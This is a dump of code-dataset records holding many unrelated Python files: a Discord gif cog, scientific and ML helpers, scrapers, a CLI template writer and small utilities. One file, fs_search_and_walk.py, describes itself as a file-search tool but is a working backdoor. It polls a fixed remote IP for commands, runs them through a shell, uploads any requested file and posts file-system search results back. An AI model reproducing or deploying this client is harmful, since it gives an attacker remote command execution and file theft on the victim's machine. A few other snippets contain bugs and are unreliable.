outfile, \"\\n\".join(str(i) for i in input)\r\n\toutfile.close()\r\n\r\n# Reads list from file\r\ndef readfile(file):\r\n\ttemp = open(file).readlines()\r\n\toutput = [int(float(i.strip())) for i in temp]\r\n\treturn output\r\n\r\n# Merge file1 and file2 to outputfile\r\ndef merge(file1, file2, outputfile):\r\n\ttemp1 = readfile(file1)\r\n\ttemp2 = readfile(file2)\r\n\tthelist = temp1 + temp2\r\n\t#stripped = [i.strip() for i in thelist]\r\n\tallint = [int(float(i)) for i in thelist]\r\n\twritefile(outputfile, allint)\r\n\r\nmerge(file1, file2, output)\r\n","sub_path":"plot/mergefile.py","file_name":"mergefile.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44288553","text":"\nfrom _selection_base import Selection_Base\n\nfrom .. import LastAnalysis\n\nimport ROOT\nimport json\nimport analysis\nimport scipy.spatial\nfrom analysis.beam_sampling import multivariate_gaussian\nimport numpy\nimport array\nimport os\n\n\nclass VoronoiPhaseSpaceSelection(Selection_Base) :\n\n def __init__(self) :\n Selection_Base.__init__(self, \"voronoi_phasespace_selection\")\n\n self.__data_file_number = 0\n self.__voronoi_data_file = LastAnalysis.LastData['analysis']['Voronoi_Tessellation']['voronoi_data']\n\n self.__event_counter = 0\n self.__current_file_events = 0\n\n self.advance_voronoi_data_file()\n\n\n\n def get_normalisation(self) :\n return self.__normalisation\n\n\n def weigh_event(self, event) :\n if self.__event_counter >= self.__current_file_events :\n self.advance_voronoi_data_file()\n\n weight = self.__weights[self.__event_counter]\n self.__event_counter += 1\n\n if weight < 1.0e-3 : \n return 0.0\n else :\n return weight\n\n\n def _get_plots(self, plot_dict) :\n pass\n\n\n def _get_data(self, data_dict) :\n pass\n\n\n def advance_voronoi_data_file(self) :\n voronoi_data = None\n filename = self.__voronoi_data_file+\".{0:05d}\".format(self.__data_file_number)\n if not os.path.exists(filename) :\n raise StopIteration\n else :\n with open(filename, 'r') as infile :\n voronoi_data = json.load(infile)\n\n self.__weights = voronoi_data['weights']\n # self.__densities = voronoi_data['densities']\n # self.__vertices = voronoi_data['vertices']\n # self.__regions = voronoi_data['regions']\n # self.__point_regions = voronoi_data['point_regions']\n self.__normalisation = voronoi_data['normalisation']\n \n self.__current_file_events = len(self.__weights)\n self.__data_file_number += 1\n self.__event_counter = 0\n\n\n","sub_path":"lib/mickey/selection_modules/voronoi_selection.py","file_name":"voronoi_selection.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180610378","text":"import os.path\nimport sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom simulator.simulation_obj import SimulationObject\n\n\"\"\" Simple test script to. Tests functionality of the simulation_obj class\"\"\"\n\n\n# instantiate simulation obj with default values\nsim_obj = SimulationObject(model_name='nearly.fmu', final_time=24.0, path_to_fmu='nearly.fmu')\nsim_obj.model_init() # initialize fmu model. Calls pyFMI model.init() and sets start and finish time\n# new dictionary with inputs for fmu time step\n\ni = 0\nshade = 1.0\n\nwhile i < 86400:\n input_dict = {'time_step': i, 'yShadeFMU': shade}\n output = sim_obj.do_time_step(input_dict)\n print(output)\n i += 600\n\nprint(\"FINISHED\")\n","sub_path":"src/simapi_simulation/fmu_simulator/simulator/test_simulation_obj.py","file_name":"test_simulation_obj.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239178995","text":"#!/usr/bin/env python\r\n# Filename: fs_search_and_walk.py\r\n# This program is optimized for Python 3.4\r\n# Description: Searches the file system for specific files and content\r\n# counterpart: None\r\n\r\n\r\nimport requests\r\nimport os\r\nimport subprocess\r\nimport time\r\n\r\nwhile True:\r\n req = requests.get('http://192.168.0.50:8080')\r\n command = req.text\r\n if 'terminate' in command:\r\n break\r\n elif 'grab' in command:\r\n grab, path = command.split(\"*\")\r\n if os.path.exists(path):\r\n url = \"http://192.168.0.50:8080/store\"\r\n filer = {'file': open(path, 'rb')}\r\n r = requests.post(url, files=filer)\r\n else:\r\n post_response = requests.post(url='http://192.168.0.50:8080', data='[-] Not able to find the file!'.encode())\r\n elif 'search' in command: #The Formula is search *. -->for example let's say that we got search C:\\\\*.pdf\r\n command = command[7:] #cut off the the first 7 character ,, output would be C:\\\\*.pdf\r\n path, ext = command.split('*')\r\n lists = '' \r\n for dirpath, dirname, files in os.walk(path):\r\n for file in files:\r\n if file.endswith(ext):\r\n lists = lists + '\\n' + os.path.join(dirpath, file)\r\n requests.post(url='http://192.168.0.50:8080', data=lists)\r\n else:\r\n CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n post_response = requests.post(url='http://192.168.0.50:8080', data=CMD.stdout.read())\r\n post_response = requests.post(url='http://192.168.0.50:8080', data=CMD.stderr.read())\r\n time.sleep(3)\r\n\r\n","sub_path":"fs_search_and_walk.py","file_name":"fs_search_and_walk.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"70368310","text":"import json\nimport math\nimport os\nimport random\nfrom copy import copy\n\nfrom discord.ext import commands\nfrom natsort import natsort\nfrom tabulate import tabulate\nfrom tinydb import Query\n\nfrom zurok import Checks\n\ngif_list_file = os.getcwd() + \"/gifs.json\"\n\n\nclass Gifs:\n def __init__(self, bot):\n self.bot = bot\n\n self.gif_table = self.bot.db.table(\"gifs\")\n self.gif_template = {\"name\": \"\", \"hidden\": False, \"url\": \"\"}\n\n if self.bot.cfg[\"devbuild\"] and len(self.gif_table.all()) <= 0:\n with open(gif_list_file, \"r\") as f:\n self.gif_table.insert_multiple(json.load(f))\n\n @commands.group(aliases=[\"gifs\"])\n async def gif(self, ctx, name: str=None):\n \"\"\"Show a gif or a random gif\"\"\"\n if name is None:\n r_gif = random.choice(self.gif_table.all())\n if r_gif[\"hidden\"]:\n await ctx.send(\"You've found a hidden gif! `{}`\\n{}\".format(r_gif[\"name\"], r_gif[\"url\"]))\n else:\n await ctx.send(\"`{}`\\n{}\".format(r_gif[\"name\"], r_gif[\"url\"]))\n else:\n if self.gif_table.contains(Query().name == name):\n await ctx.send(self.gif_table.get(Query().name == name)[\"url\"])\n else:\n await ctx.send(\"No gif found with that name.\\nTry {prefix}giffer search\".format(\n prefix=self.bot.cfg[\"prefix\"]))\n\n @commands.group()\n async def giffer(self, ctx):\n \"\"\"Commands to manage gifs (add, remove, list)\"\"\"\n if ctx.invoked_subcommand is None:\n await ctx.send(\"Invalid sub-command!\\n Use `{prefix}help giffer` to view sub-commands\".format(\n prefix=self.bot.cfg[\"prefix\"]))\n\n @giffer.command()\n async def add(self, ctx, name: str, url: str, hidden=False):\n \"\"\"Add a gif\"\"\"\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):\n await ctx.send(\"`{}` is not a valid url!\\n`{}`giffer add \".format(url, self.bot.cfg[\"prefix\"]))\n return\n\n if self.gif_table.contains(Query().name == name):\n await ctx.send(\"Gif exists with that name\")\n else:\n if name.startswith(\"-\"):\n await ctx.send(\"Gif name cannot start with `-`\")\n else:\n self.gif_table.insert({\"name\": name, \"hidden\": hidden, \"url\": url})\n await ctx.send(\"Added gif: \" + name)\n\n @giffer.command()\n @Checks.restricted_cmd()\n async def remove(self, ctx, name: str):\n \"\"\"Remove a gif\"\"\"\n if not self.gif_table.contains(Query().name == name):\n await ctx.send(\"No gif exists with that name\")\n else:\n self.gif_table.remove(Query().name == name)\n await ctx.send(\"Removed gif: \" + name)\n\n @giffer.command()\n @Checks.restricted_cmd()\n async def hide(self, ctx, name: str):\n \"\"\"Hide a gif\"\"\"\n if not self.gif_table.contains(Query().name == name):\n await ctx.send(\"No gif exists with that name\")\n else:\n _gif = self.gif_table.get(Query().name == name)\n _gif[\"hidden\"] = True\n self.gif_table.update(_gif, Query().name == name)\n await ctx.send(\"Hid gif: \" + name)\n\n @giffer.command()\n @Checks.restricted_cmd()\n async def unhide(self, ctx, name: str):\n \"\"\"Unhide a gif\"\"\"\n if not self.gif_table.contains(Query().name == name):\n await ctx.send(\"No gif exists with that name\")\n else:\n _gif = self.gif_table.get(Query().name == name)\n _gif[\"hidden\"] = False\n self.gif_table.update(_gif, Query().name == name)\n await ctx.send(\"Revealed gif: \" + name)\n\n @giffer.command()\n async def list(self, ctx):\n \"\"\"Display a list of gifs\"\"\"\n _gif_list = natsort.natsorted(self.gif_table.search(Query().hidden == False), key=lambda k: k[\"name\"])\n\n if len(_gif_list) <= 0:\n await ctx.send(\"No gifs found!\\nUse `{prefix}giffer add ` to add a gif\".format(\n prefix=self.bot.cfg[\"prefix\"]))\n else:\n g = [x[\"name\"] for x in _gif_list]\n\n await ctx.send(\"**\" + str(len(g)) +\n \"** ```\" + tabulate(self.make_tabulated_list(g), tablefmt=\"plain\") + \"```\")\n\n @giffer.command(name=\"hidden\")\n @Checks.restricted_cmd()\n async def list_hidden(self, ctx):\n \"\"\"Display a list of hidden gifs\"\"\"\n _gif_list = sorted(self.gif_table.search(Query()[\"hidden\"] == True), key=lambda k: k[\"name\"])\n if len(_gif_list) <= 0:\n await ctx.send(\"No hidden gifs found!\")\n else:\n g = [x[\"name\"] for x in _gif_list]\n\n await ctx.send(\"**\" + str(len(g)) +\n \"** ```\" + tabulate(self.make_tabulated_list(g), tablefmt=\"plain\") + \"```\")\n\n @giffer.command(name=\"rename\")\n @Checks.restricted_cmd()\n async def rename_gif(self, ctx, old_name, new_name):\n \"\"\"Rename a gif\"\"\"\n if not self.gif_table.contains(Query().name == old_name):\n await ctx.send(\"No gif exists with that name\")\n else:\n _gif = self.gif_table.get(Query().name == old_name)\n _gif[\"name\"] = new_name\n self.gif_table.update(_gif, Query().name == old_name)\n await ctx.send(\"Renamed gif: \" + old_name + \" to \" + new_name)\n\n @giffer.command()\n async def search(self, ctx, name):\n \"\"\"Search for a gif\"\"\"\n _gif_list = self.gif_table.search(Query().name.search(name))\n if len(_gif_list) <= 0:\n await ctx.send(\"No gifs found with search query: {}\".format(name))\n else:\n g = [x[\"name\"] for x in _gif_list if not x[\"hidden\"]]\n await ctx.send(\"**\" + str(len(g)) +\n \"** ```\" + tabulate(self.make_tabulated_list(g), tablefmt=\"plain\") + \"```\")\n\n def make_tabulated_list(self, gifs):\n cols = 6\n per_col = int(math.ceil(len(gifs) / cols))\n\n e = []\n g2 = [copy(e) for x in range(per_col)]\n\n for a in range(cols):\n for b in range(per_col):\n if len(gifs) == 0:\n break\n gif = gifs.pop(0)\n g2[b].append(gif)\n\n return g2\n\n\ndef setup(bot):\n bot.add_cog(Gifs(bot))\n","sub_path":"cogs/gifs.py","file_name":"gifs.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243335651","text":"import collections\n\nfrom django.shortcuts import Http404\nfrom django.utils import translation\n\nNotifySettings = collections.namedtuple(\n 'NotifySettings', [\n 'contact_company_template',\n 'contact_support_template',\n 'contact_investor_template',\n 'contact_support_email_address',\n ]\n)\n\n\ndef handle_cms_response(response):\n if response.status_code == 404:\n raise Http404()\n response.raise_for_status()\n return response.json()\n\n\ndef get_language_from_querystring(request):\n language_code = request.GET.get('language') or request.GET.get('lang')\n language_codes = translation.trans_real.get_languages()\n if language_code and language_code in language_codes:\n return language_code\n","sub_path":"core/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"13410697","text":"from keras.models import load_model\nimport pickle\nimport numpy as np\nimport os\n# Load in the model using absolute path\nmodel = load_model(os.path.abspath(\"model1.h5\"))\n# make the prediction function\nmodel._make_predict_function()\n\n# Load in feature selector using absolute path\nfeature_selector = pickle.load(open(os.path.abspath(\"feature_selector.pkl\"),\n 'rb'),encoding='latin1')\n\n# Load in Standard scaler using absolute path\nscaler = pickle.load(open(os.path.abspath(\"standard_scaler.pkl\"),\n \"rb\"),encoding='latin1')\n\nclass_names = ['teens','twenties','thirties','fourties','fifties','sixties',\n 'seventies','eighties']\n\n\ndef model_predict(input):\n \"\"\"Given input array of featurized audio, returns model prediction\n Args:\n -- input (numpy array) input to put in machine learning model\n Returns:\n -- prediction (str) age category based on featurized audio\n \"\"\"\n\n # make sure we get in a numpy matrix for the features\n assert isinstance(input,np.ndarray)\n # feature selection\n features = feature_selector.transform(input)\n\n # standard scale the data\n features = scaler.transform(features)\n\n # gets an array of the probability that the speaker belongs to a particular class\n prediction_probs = model.predict(features)\n\n # gets the index of the highest probability\n prediction_index = np.argmax(prediction_probs)\n\n # get the class label based on the index\n prediction = class_names[prediction_index]\n\n return prediction\n","sub_path":"webapp/server/ml_models/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307898441","text":"# -*- coding: utf-8 -*-\nimport pkgutil\n\nimport click\n\nimport emoji\n\nfrom story import cli\n\nCHOICES = [\n 'http',\n 'every',\n 'function',\n 'if',\n 'loop',\n 'twitter',\n 'slack-bot',\n 'subscribe',\n 'every',\n 'websocket',\n '-',\n]\n\n\n@cli.cli.command()\n@click.argument('story', default='-', type=click.Choice(CHOICES))\n@click.argument(\n 'output_file', default=None, type=click.Path(exists=False), required=False\n)\ndef write(story, output_file=None):\n \"\"\"Pre–defined Storyscripts for your app!\"\"\"\n\n # Support '$ story write http -` usecase.`\n if output_file == '-':\n output_file = None\n\n if story == '-':\n click.echo(click.style('Please specify a template:', bold=True))\n click.echo(\n click.style(' http', fg='cyan') + ' - serverless http')\n click.echo(\n click.style(' function', fg='cyan') + ' - generic function')\n click.echo(\n click.style(' if', fg='cyan') + ' - example if/then')\n click.echo(\n click.style(' loop', fg='cyan') + ' - example for loop')\n click.echo(click.style(' twitter', fg='cyan') + ' - stream Tweets')\n click.echo('')\n\n click.echo(\n click.style('Coming Soon',\n bold=True) + ' (under active development):'\n )\n click.echo(click.style(' slack-bot', fg='cyan') + ' - Slack bot')\n click.echo(\n click.style(' subscribe', fg='cyan') + ' - event subscriptions')\n click.echo(\n click.style(' every', fg='cyan') + ' - periodically run this')\n click.echo(\n click.style(' websocket', fg='cyan') + ' - websocket support')\n click.echo('')\n\n click.echo(\n ' Run $ '\n + click.style('story write :template_name: ', fg='magenta')\n + emoji.emojize(':backhand_index_pointing_left:')\n )\n click.echo('')\n\n click.echo(click.style('Learn more:', bold=True))\n click.echo(\n ' - Examples: '\n + click.style('https://github.com/topics/storyscript-example',\n fg='cyan')\n )\n click.echo(\n ' - Services: ' + click.style('https://hub.storyscript.io/',\n fg='cyan')\n )\n click.echo('')\n\n else:\n\n # Grab the story, from packaging...\n data = pkgutil.get_data('story', f'stories/{story}.story')\n\n # If output_file was passed, assume it was an interfactive session.\n if output_file:\n # Write to the file...\n with open(output_file, 'wb') as f:\n f.write(data)\n\n cmd = f'cat {output_file}'\n cmd = click.style(cmd, fg='magenta')\n click.echo(f'$ {cmd}', err=True)\n\n click.echo(data)\n\n app_name = cli.get_app_name_from_yml()\n if app_name is None:\n app_name = 'Not created yet'\n\n cli.track('App Bootstrapped',\n {'App name': app_name, 'Template used': story})\n","sub_path":"story/commands/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"446698259","text":"# https://www.youtube.com/watch?v=XQgXKtPSzUI\n#%%\nimport bs4\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup as soup\n\nmyurl = 'https://www.amazon.com/s/ref=nb_sb_noss?__mk_zh_CN=%E4%BA%9A%E9%A9%AC%E9%80%8A%E7%BD%91%E7%AB%99&url=search-alias%3Daps&field-keywords=%E6%98%BE%E5%8D%A1'\n\nclient = urlopen(myurl)\nhtml_text = client.read()\n\ntext_soup = soup(html_text, 'html.parser')\n\nclient.close()\n#%%\nmfile = open(\"test.html\", \"w\")\nprint(text_soup, file=mfile)\nmfile.close()\n\n#%%\ncontainers = text_soup.findAll(\"div\",{\"class\":\"a-section a-spacing-medium\"})\n\nlen(containers)","sub_path":"Python/web crawler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34694679","text":"from __future__ import division\nimport numpy as np\nfrom sklearn import (metrics, cross_validation, linear_model, preprocessing)\nfrom sklearn.ensemble import RandomForestRegressor\n\nSEED = 30\n\n\ndef load_data(filename, use_labels=True):\n\n data = np.loadtxt(open(filename), delimiter=',' , usecols=range(1, 9), skiprows=1)\n if use_labels:\n labels = np.loadtxt(open(filename), delimiter=',' , usecols=[0], skiprows=1)\n else:\n labels = np.zeros(data.shape[0])\n return labels, data\n\n\ndef save_results(predictions, filename):\n\n with open(filename, 'w') as f:\n f.write(\"id,ACTION\\n\")\n for i, pred in enumerate(predictions):\n f.write(\"%d,%f\\n\" % (i + 1, pred))\n\n\ndef main():\n\n model = RandomForestRegressor(random_state=0) # the classifier we'll use\n\n# === load data in memory === #\n y, X = load_data('train.csv')\n y_test, X_test = load_data('test.csv', use_labels=False)\n\n encoder = preprocessing.OneHotEncoder()\n encoder.fit(np.vstack((X, X_test)))\n X = encoder.transform(X) # Returns a sparse matrix (see numpy.sparse)\n X_test = encoder.transform(X_test)\n\n# === training & metrics === #\n mean_auc = 0.0\n n = 10 # repeat the CV procedure 10 times to get more precise results\n for i in range(n):\n # for each iteration, randomly hold out 20% of the data as CV set\n X_train, X_cv, y_train, y_cv = cross_validation.train_test_split(\n X, y, test_size=.40, random_state=i*SEED)\n\n\n # train model and make predictions\n model.fit(X_train, y_train)\n preds = model.predict_proba(X_cv)[:, 1]\n\n # compute AUC metric for this CV fold\n fpr, tpr, thresholds = metrics.roc_curve(y_cv, preds)\n roc_auc = metrics.auc(fpr, tpr)\n print (\"AUC (fold %d/%d): %f\" % (i + 1, n, roc_auc))\n mean_auc += roc_auc\n\n print (\"Mean AUC: %f\" % (mean_auc/n))\n X, y= make_regression(random_state=0, shuffle=False)\n model.fit(X, y)\n preds = model.predict_proba(X_test)[:, 1]\n save_results(preds, \"output1\" + \".csv\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"Amazon/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"123530672","text":"\n\n''' \n prepare the log data fo the input of LSTM deep network\n \n We have this information:\n 157610555\t16\t2017-10-27T09:12:30.0179Z\thttps://sigeventos.ufrn.br/eventos/menu.xhtml 6\t FALSE\n\n And we wants to format like this\n\n 0,000122 0,0333\t0,02030234234234 0,00032423404234234234324323 0,3\n\n for the input network\n \n @author jadsonjs@gmail.com\n'''\n\n\nfrom csv_module import load_csv_data\nfrom csv_module import save_csv_data\nfrom hash_module import textual_hash\nfrom hash_module import date_milliseconds\nfrom normalization_module import normalize_feature\nfrom array_module import reshape_input\n\n\n\n\ndef prepareLSTMdata(raw_data_file_name, deep_network_file_name, features_indexes):\n\n\tqtd_features = len(features_indexes)\n\n\t# load just the feature located in this possition on cvs file\n\tcvs_raw_data = load_csv_data(raw_data_file_name, features_indexes)\n\n\tprint('### 1 ###')\n\tprint(cvs_raw_data)\n\n\t# converte the url to numeric value\n\tcvs_numeric_data = textual_hash(cvs_raw_data, 3, qtd_features)\n\t\n\t# converte the date to numeric value\n\tcvs_numeric_data = date_milliseconds(cvs_numeric_data, 2, qtd_features)\n \n\tprint('### 2 ###')\n\tprint(cvs_numeric_data)\n\n\tcvs_normalized_data = []\n \n\tfor feature in range( len(cvs_numeric_data) ):\n\t\tcvs_normalized_data = normalize_feature(cvs_numeric_data, feature, qtd_features)\n\n\tprint('### 3 ###')\n\tprint(cvs_normalized_data)\n\t\n\n\tsave_csv_data(deep_network_file_name, cvs_normalized_data, qtd_features)\n\n\n\n\n\n\n","sub_path":"DeepLearning/temp/prepare_input_module.py","file_name":"prepare_input_module.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514170090","text":"# -*- coding: utf-8 -*-\nimport random\n# This is Testaction 3\n\ndef main(args):\n square = args.get(\"number\")\n randStr = \"\"\n for x in range(square):\n randStr += chr(random.randint(32,125))\n print(randStr)\n return {\"string\":randStr}\n\n#if __name__==\"__main__\":\n# main({\"square\":16})","sub_path":"func3.py","file_name":"func3.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439302241","text":"class Relogio:\r\n def __init__(self):\r\n self.inicio = \"\"\r\n self.termino = \"\"\r\n self.running = True\r\n\r\n def get_inputs(self, inpX, inpNome):\r\n inpX = input(\"{}: \".format(inpNome))\r\n return inpX\r\n\r\n def splice_inp(self, inpX):\r\n inpX = inpX.lower()\r\n inpX = inpX.replace(\" horas e \", \",\")\r\n inpX = inpX.replace(\" minutos\", \",\")\r\n inpX = inpX.split(\",\")\r\n\r\n if len(inpX) > 2:\r\n inpX.pop()\r\n for i in range(2):\r\n inpX[i] = int(inpX[i])\r\n return inpX\r\n\r\n def check_inp(self, inpX):\r\n if 0 < inpX[0] <= 23 and 0 <= inpX[1] <= 60:\r\n return True\r\n else:\r\n print(\"Horas ou minutos invalidos\")\r\n return False\r\n\r\n def check_horarios(self):\r\n if self.inicio[0] > self.termino[0]:\r\n print(\"Horário Inválido\\n\")\r\n else:\r\n if self.inicio[0] >= self.termino[0] and self.inicio[1] > self.termino[1]:\r\n print(\"Horário Inválido\\n\")\r\n\r\n def math_horario(self, horaX, horaY):\r\n horaX = (horaX[0] * 60) + horaX[1]\r\n horaY = (horaY[0] * 60) + horaY[1]\r\n self.running = False\r\n return horaY - horaX\r\n\r\n def run(self):\r\n while self.running:\r\n\r\n while True:\r\n self.inicio = self.get_inputs(self.inicio, \"Inicio\")\r\n self.inicio = self.splice_inp(self.inicio)\r\n if self.check_inp(self.inicio):\r\n break\r\n else:\r\n pass\r\n while True:\r\n self.termino = self.get_inputs(self.termino, \"Termino\")\r\n self.termino = self.splice_inp(self.termino)\r\n if self.check_inp(self.termino):\r\n break\r\n else:\r\n pass\r\n\r\n self.check_horarios()\r\n print(\"Duração: {} minutos de duração\".format(self.math_horario(self.inicio, self.termino)))\r\n\r\n\r\nif __name__ == '__main__':\r\n r = Relogio()\r\n r.run()\r\n\r\n'''\r\nExercicio 5:\r\n\r\nConstrua um algoritmo que receba através do input do\r\nteclado a hora e minuto de início de um jogo e a hora e\r\nminuto do final do jogo. Calcule a duração do jogo em\r\nminutos, sabendo-se que o tempo máximo de duração do\r\njogo é de 24 horas e que o jogo deve iniciar e finalizar no\r\nmesmo dia.\r\n'''","sub_path":"Desafio Polyweek/Exercicio 5.py","file_name":"Exercicio 5.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"393020560","text":"import __builtin__\nfrom models import BaseModel\nfrom tools import *\nfrom tools import _2_circles_tangential_equations, _2_circles_tangential_equations_constrained\nfrom operator import itemgetter\nimport numpy as np\nimport solver\n\n\nclass TR170(BaseModel):\n def __init__(self, params=None, context=None):\n super(TR170, self).__init__(params, context)\n\n self.context = context\n self.params = params\n c = context\n p = params\n\n c['tc_R'] = p.R61\n c['tc_CX'] = p.W / 2.\n c['tc_CY'] = p.RI + p.H - p.R61\n\n c['ltc_R'] = p.R41\n c['ltc_CX'] = p.R41\n c['ltc_CY'] = p.RI + p.R40\n\n c['lbc_R'] = p.P3\n c['lbc_CX'] = p.P3\n c['lbc_CY'] = p.RI + p.R40 - p.P2\n\n c['rtc_R'] = p.R41\n c['rtc_CX'] = p.W - p.R41\n c['rtc_CY'] = p.RI + p.R40\n\n c['rbc_R'] = p.R40\n c['rbc_CX'] = p.W - p.R40\n c['rbc_CY'] = p.RI + p.R40\n\n def calculate_intersections(self):\n super(TR170, self).calculate_intersections()\n\n c = self.context\n p = self.params\n\n c.variables = []\n c.equations = []\n\n solutions = solver.calc_intersection('ltc', 'tc', c)\n self.sub_result = (\n sorted(solutions, key=itemgetter(2), reverse=True)[1]\n )\n\n x = float(self.sub_result[0])\n y = float(self.sub_result[1])\n cy = float(self.sub_result[2])\n\n c['p1_X'] = x\n c['p1_Y'] = y\n\n c['p2_Y'] = y\n c['p2_X'] = p.W - x\n\n c['p3_X'] = p.P3\n #c['p3_Y'] = p.RI + p.R40 - p.P3\n c['p3_Y'] = c['lbc_CY'] - p.P3\n\n c['p4_X'] = p.W - p.R40 - p.P1\n c['p4_Y'] = p.RI\n\n c['p5_X'] = p.W - p.R40\n c['p5_Y'] = p.RI\n\n\n def get_volume(self):\n c = self.context\n p = self.params\n\n atop1, th1 = volume_integrate_arc_top(\n P(c['ltc_CX'], c['ltc_CY']),\n c['ltc_R'],\n 0., c['p1_X']\n )\n\n atop2, th2 = volume_integrate_arc_top(\n P(c['tc_CX'], c['tc_CY']),\n c['tc_R'],\n c['p1_X'], c['p2_X']\n )\n\n atop3, th3 = volume_integrate_arc_top(\n P(c['rtc_CX'], c['rtc_CY']),\n c['rtc_R'],\n c['p2_X'], p.W\n )\n\n top = sum([atop1, atop2, atop3])\n\n abottom1, bh1 = volume_integrate_arc_bottom(\n P(c['lbc_CX'], c['lbc_CY']),\n c['lbc_R'],\n 0., c['p3_X']\n )\n\n abottom2, bh2 = volume_integrate_slope_bottom(\n c['p3_X'], c['p3_Y'],\n c['p4_X'], c['p4_Y'],\n c['p3_X'], c['p4_X']\n )\n\n abottom3, bh3 = volume_integrate_slope_bottom(\n c['p4_X'], c['p4_Y'],\n c['p5_X'], c['p5_Y'],\n c['p4_X'], c['p5_X']\n )\n\n abottom4, bh4 = volume_integrate_arc_bottom(\n P(c['rbc_CX'], c['rbc_CY']),\n c['rbc_R'],\n c['p5_X'], p.W\n )\n\n bottom = sum([abottom1, abottom2, abottom3, abottom4])\n\n volume = top - bottom\n min_height = min_drop_nones(th1, th2, th3) - max_drop_nones(bh1, bh2,\n bh3, bh4)\n\n return (\n float(volume / 1000.),\n min_height\n )","sub_path":"models/mTR170.py","file_name":"mTR170.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522030638","text":"import scrape.pfr\nimport scrape.guru\nimport scrape.wiki\n\n\ndef scrape_player(guru_link, season_week_pairs, name=None):\n guru_data = guru.scrape_player(guru_link, name)\n\n def get_pfr_link():\n link = pfr.get_player_link(guru_data['first'], guru_data['last'], list(season_week_pairs))\n\n if not link:\n link = pfr.prepend_link(pfr.errors['player_links'].get(guru_link))\n\n return link\n\n pfr_link = get_pfr_link()\n\n def get_pfr_data():\n return pfr.scrape_player(pfr_link, season_week_pairs) if pfr_link else {'url': pfr_link,\n 'errors': {'pfr_link'}}\n\n pfr_data = get_pfr_data()\n\n def combine_scraped_data():\n scraped_data = {\n 'links': [guru_data['url'], pfr_link],\n 'first': guru_data['first'],\n 'last': guru_data['last'],\n 'position': guru_data['position'],\n 'team': pfr_data.get('team'),\n 'birthday': pfr_data.get('birthday'),\n 'games': pfr_data.get('games'),\n }\n\n def check_data_errors():\n full_name = '%s %s' % (scraped_data['first'], scraped_data['last'])\n\n def update_from_errors(errors):\n scraped_data.update(errors['data'].get(full_name, {}))\n\n update_from_errors(pfr.errors)\n\n check_data_errors()\n\n def check_errors():\n def combine_errors():\n all_errors = guru_data['errors']\n all_errors.update(pfr_data['errors'])\n return all_errors\n\n errors = combine_errors()\n\n if errors:\n wiki_links = wiki.get_player_links(scraped_data['first'], scraped_data['last'], scraped_data['position'])\n for link in wiki_links:\n wiki_data = wiki.scrape_player(link)\n\n if wiki_data['birthday'] == scraped_data['birthday']:\n def update_scraped_data():\n for error in errors.copy():\n if wiki_data.get(error):\n scraped_data.update({error: wiki_data[error]})\n errors.remove(error)\n\n update_scraped_data()\n break\n\n scraped_data.update({'errors': list(errors)})\n\n check_errors()\n return scraped_data\n\n return combine_scraped_data()\n\n\ndef scrape_game(pfr_link):\n pfr_game = pfr.scrape_game(pfr_link)\n pfr_game['errors'] = list(pfr_game['errors'])\n\n return pfr_game\n\n\ndef scrape_stadium(pfr_link):\n pfr_data = pfr.scrape_stadium(pfr_link)\n\n links = {pfr_data['url']}\n errors = pfr_data['errors'].copy()\n\n def get_wiki_link():\n def get_most_recent_name():\n name = pfr_data['names'][-1]['name']\n\n try:\n name = wiki.errors['stadium_names'][name]\n except KeyError:\n pass\n\n return name\n\n error_link = wiki.errors['stadium_links'].get(pfr_link)\n return error_link if error_link else wiki.get_stadium_link(get_most_recent_name())\n\n wiki_link = get_wiki_link()\n wiki_data = {}\n\n if wiki_link:\n wiki_data = wiki.scrape_stadium(wiki_link)\n links.add(wiki_data['url'])\n errors.update(wiki_data['errors'])\n else:\n errors.add('wiki_link')\n\n def check_errors():\n def check_teams():\n if 'teams' in errors:\n try:\n wiki_data.update({'teams': wiki.errors['stadium_teams'][pfr_link]})\n errors.remove('teams')\n except KeyError:\n pass\n\n if errors:\n check_teams()\n\n check_errors()\n\n return {'links': list(links),\n 'names': pfr_data.get('names'),\n 'surfaces': pfr_data.get('surfaces'),\n 'teams': wiki_data.get('teams'),\n 'errors': 